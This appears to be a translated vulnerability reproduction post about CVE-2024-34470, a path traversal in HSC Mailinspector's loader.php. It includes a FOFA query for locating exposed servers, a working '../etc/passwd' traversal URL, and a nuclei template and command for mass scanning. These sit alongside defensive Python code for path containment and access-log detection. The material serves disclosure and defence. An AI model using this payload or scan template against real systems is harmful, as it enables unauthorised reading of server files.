1. Vulnerability name
HSC Mailinspector arbitrary file read vulnerability
2. Vulnerability description
An unauthenticated user can abuse a path traversal flaw in the /public/loader.php file. The path parameter is not properly checked to ensure that the requested file and directory lie within the webroot, so an attacker can read arbitrary files on the server.
3. Affected versions
HSC Mailinspector 5.2.17-3 through 5.2.18
4. Cyberspace search engine query
FOFA "mailinspector/public"
5. Vulnerability reproduction
/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
A directory traversal vulnerability lets an attacker walk the directory structure of the target system and access files in other directories. It usually arises because the application does not properly validate or restrict the path supplied by the user before using it to open a file.
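The cause described above is a missing containment check on the user-controlled path. The following is an added illustration, not the vendor's code: a naive "join and read" resolver beside a hardened one that canonicalises the path and rejects anything that resolves outside the webroot. The WEBROOT value and the function names are assumptions chosen for the example.

```python
import os

# Added example (not the vendor's code): two ways a loader script can turn a
# user-supplied ?path= value into a filesystem path. WEBROOT is a constructed,
# hypothetical document root; nothing here needs to exist on disk.
WEBROOT = "/srv/example-webroot/mailinspector/public"


def resolve_unsafe(webroot: str, user_path: str) -> str:
    """Vulnerable pattern: the request value is appended to the webroot and
    handed straight to a file read.  '../' segments walk out of the webroot,
    and an absolute value replaces it entirely."""
    return os.path.normpath(os.path.join(webroot, user_path))


def resolve_within_webroot(webroot: str, user_path: str):
    """Hardened pattern: canonicalise both sides (collapsing '..' and following
    symlinks) and accept the result only if it is still inside the webroot.
    Returns the canonical path, or None when the request must be rejected."""
    base = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(base, user_path))
    try:
        # commonpath compares whole path components, so a sibling such as
        # '/srv/example-webroot-other' is correctly rejected.
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        # raised when the two paths cannot be compared (e.g. different drives)
        inside = False
    return candidate if inside else None


if __name__ == "__main__":
    for p in ("css/style.css", "../../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{p!r:40} unsafe -> {resolve_unsafe(WEBROOT, p)}")
        print(f"{'':40} safe   -> {resolve_within_webroot(WEBROOT, p)}")
```

The check must run on the decoded, fully resolved path: comparing string prefixes before `realpath`, or stripping `../` with a single replace, still leaves room for encoded or nested sequences to pass through.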
nuclei.exe -t CVE-2024-34470.yaml -l host.txt
It is recommended to update the affected system or software to the latest version to remediate the vulnerability.
Batch verification script
id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"
    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
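The nuclei template above is the scanner's view; from the defender's side the same request pattern is visible in the web server's access log. The following is an added example, not part of the original write-up: it parses combined-format log lines, percent-decodes the request target, and flags requests to loader.php that carry a traversal sequence. The log lines in SAMPLE_LOG are constructed for the example.

```python
import re
from urllib.parse import unquote

# Added example (not part of the original write-up): flag requests to loader.php
# whose ?path= value contains a directory-traversal sequence, working from
# combined-format web server access logs.  SAMPLE_LOG is constructed data.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jun/2024:12:00:01 +0000] "GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1" 200 1312
203.0.113.10 - - [10/Jun/2024:12:00:03 +0000] "GET /mailinspector/public/loader.php?path=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1312
198.51.100.7 - - [10/Jun/2024:12:01:00 +0000] "GET /mailinspector/public/loader.php?path=css/style.css HTTP/1.1" 200 4102
198.51.100.7 - - [10/Jun/2024:12:01:05 +0000] "GET /mailinspector/login.php HTTP/1.1" 200 2210
192.0.2.55 - - [10/Jun/2024:12:02:10 +0000] "GET /mailinspector/public/loader.php?path=....//....//etc/passwd HTTP/1.1" 404 215
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# '..' followed by a slash or backslash, evaluated after percent-decoding
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def decode_target(target: str) -> str:
    # Decode twice so a double-encoded "../" ("%252e%252e%252f") is also caught.
    return unquote(unquote(target))


def is_traversal_attempt(target: str) -> bool:
    decoded = decode_target(target)
    return "loader.php" in decoded and TRAVERSAL_RE.search(decoded) is not None


def scan_log(text: str):
    """Return one record per suspicious request: (ip, status, decoded target).
    A 200 response to such a request is the strongest signal the read succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal_attempt(m["target"]):
            continue
        hits.append((m["ip"], m["status"], decode_target(m["target"])))
    return hits


if __name__ == "__main__":
    for ip, status, target in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {status} {target}")
```

The decoded target, not the raw one, is what the regex inspects, so the `%2F`-encoded and the `....//` variants are reported alongside the plain form; the HTTP status then separates attempts that returned content from those the server rejected.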
Originally published on the WeChat public account (Adler学安全): Vulnerability reproduction - CVE-2024-34470